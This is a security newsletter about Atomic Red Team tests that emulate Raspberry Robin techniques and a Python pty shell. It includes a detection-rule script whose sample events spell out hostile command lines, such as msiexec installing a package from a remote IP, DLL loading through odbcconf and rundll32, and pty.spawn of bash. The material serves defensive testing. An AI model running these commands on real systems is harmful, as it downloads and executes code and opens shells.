Welcome to this month's edition of the Atomic Newsletter, a monthly email with updates and news about Atomic Red Team™ and its related projects such as MITRE ATT&CK®, Invoke-AtomicRedTeam, AtomicTestHarnesses, and more. Visit our website and join the community chat with us on Slack!

This month's edition highlights tests for Raspberry Robin, a threat discovered by Red Canary that Microsoft recently linked to the EvilCorp hacking group.

What is Raspberry Robin?

For nearly a year, Red Canary has been tracking a worm spread by external drives that leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.

How can I test my detection coverage?

Watch Red Canary's Paul Michaud walk through four Atomic Red Team tests that will help you emulate behaviors associated with Raspberry Robin. Are you able to observe, detect, or prevent infection?

T1059.003: CMD reading and executing from file

We developed this atomic specifically to emulate Raspberry Robin. It uses the “standard-in” command prompt feature to read and execute a file via cmd.exe.

T1218.007: msiexec downloading additional packages

This atomic retrieves an arbitrary MSI file from a remote IP address and executes it.

T1218.008: odbcconf loading and executing locally stored DLLs

This atomic uses odbcconf.exe to load and execute a locally stored DLL.

T1218.011: rundll32 initiating network connections

This atomic emulates the rundll32.exe process start and the network connection (with a corresponding command line).


Top contributors

  • danf42
  • MHaggis4
  • Leomon5
  • tccontre
  • tr4cefl0w

New contributors

  • it-native
  • TaintedHorizon
  • masonharrell
  • moullos
  • alireza-ebrahimi
  • felipebueno
  • burning-pm
  • mrrothe
  • arames13

NEW TEST: Python pty module spawning sh or bash

First-time contributor ruyek-git created a test that emulates malicious use of the Python pty module observed by Volexity, as part of their investigation into widespread exploitation of CVE-2022-26134, an unauthenticated remote code execution vulnerability in Atlassian Confluence.
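The four Raspberry Robin tests listed above and the new Python pty test are all process-level behaviours, so a quick way to check whether your telemetry would surface them is to run a handful of narrow rules over process-creation records. The block below is an added example, not code from Atomic Red Team, Red Canary or Volexity: the event schema (image, command line, a network flag), the sample events, the hosts and file paths are all constructed, the predicates are heuristics written from the one-line test descriptions rather than any vendor's detection logic, and the pty rule is tagged T1059.006 (Python), an ID the newsletter itself does not state.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record (constructed shape, not a real EDR schema)."""
    image: str              # lower-cased executable basename, e.g. "cmd.exe"
    cmdline: str            # full command line as logged
    network: bool = False   # True when a network connection was attributed to this process


# Each predicate is deliberately narrow and mirrors the behaviour one Atomic test exercises.
def cmd_reads_from_stdin(e: ProcessEvent) -> bool:
    # cmd.exe fed a file through standard input ("<" redirection)
    return e.image == "cmd.exe" and re.search(r"<\s*\S", e.cmdline) is not None


def msiexec_remote_package(e: ProcessEvent) -> bool:
    # msiexec asked to install a package from an http(s) URL rather than a local path
    return e.image == "msiexec.exe" and re.search(r"https?://", e.cmdline, re.I) is not None


def odbcconf_loads_dll(e: ProcessEvent) -> bool:
    # odbcconf.exe invoked with a register-server action pointing at a DLL
    c = e.cmdline.lower()
    return e.image == "odbcconf.exe" and "regsvr" in c and ".dll" in c


def rundll32_network(e: ProcessEvent) -> bool:
    # rundll32.exe that was seen making a network connection
    return e.image == "rundll32.exe" and e.network


def python_pty_shell(e: ProcessEvent) -> bool:
    # a python interpreter spawning sh or bash through the pty module
    return (e.image.startswith("python")
            and re.search(r"pty\.spawn\(.*\b(bash|sh)\b", e.cmdline) is not None)


# ATT&CK technique ID -> predicate. T1059.006 for the pty rule is this example's choice.
RULES = [
    ("T1059.003", cmd_reads_from_stdin),
    ("T1218.007", msiexec_remote_package),
    ("T1218.008", odbcconf_loads_dll),
    ("T1218.011", rundll32_network),
    ("T1059.006", python_pty_shell),
]


def evaluate(event: ProcessEvent) -> list[str]:
    """Return the technique IDs whose rule matches this single event."""
    return [tid for tid, rule in RULES if rule(event)]


def scan(events: list[ProcessEvent]) -> list[tuple[str, str]]:
    """Run every rule over every event and return (technique, cmdline) hits."""
    hits = []
    for e in events:
        for tid in evaluate(e):
            hits.append((tid, e.cmdline))
    return hits


# Constructed sample telemetry (not real logs); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("cmd.exe", r"cmd.exe /r < C:\Users\Public\stage.txt"),
    ProcessEvent("msiexec.exe", r"msiexec.exe /q /i http://192.0.2.10/pkg.msi"),
    ProcessEvent("odbcconf.exe", r"odbcconf.exe /a {regsvr C:\Users\Public\payload.dll}"),
    ProcessEvent("rundll32.exe", r"rundll32.exe C:\Users\Public\payload.dll,Start", network=True),
    ProcessEvent("python3", "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"),
    ProcessEvent("msiexec.exe", r"msiexec.exe /i C:\Installers\vendor.msi"),   # benign: local package
    ProcessEvent("cmd.exe", r"cmd.exe /c dir > C:\temp\out.txt"),              # benign: no stdin redirect
]


if __name__ == "__main__":
    for tid, cmd in scan(SAMPLE_EVENTS):
        print(f"{tid}: {cmd}")
```

Feed `scan()` your own exported process events in the same shape and compare the hits against what your EDR or SIEM alerted on while the atomics ran: a technique that appears here but not in your console is a visibility gap worth chasing. The two benign events show why each rule keys on the behaviour (remote URL, stdin redirect) rather than on the binary name alone, since msiexec and cmd are everywhere on a normal host.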

New integration with VECTR

You can now import Atomic Red Team execution logs into VECTR, a free purple team reporting tool. Atomic Red Team maintainer Carrie Roberts shows you how in a new video from our friends at Antisyphon Training.

Work with us!

Red Canary is looking for a developer advocate to focus on Atomic Red Team. Join us and work alongside the Atomic community to address cybersecurity challenges through open source tools and education.
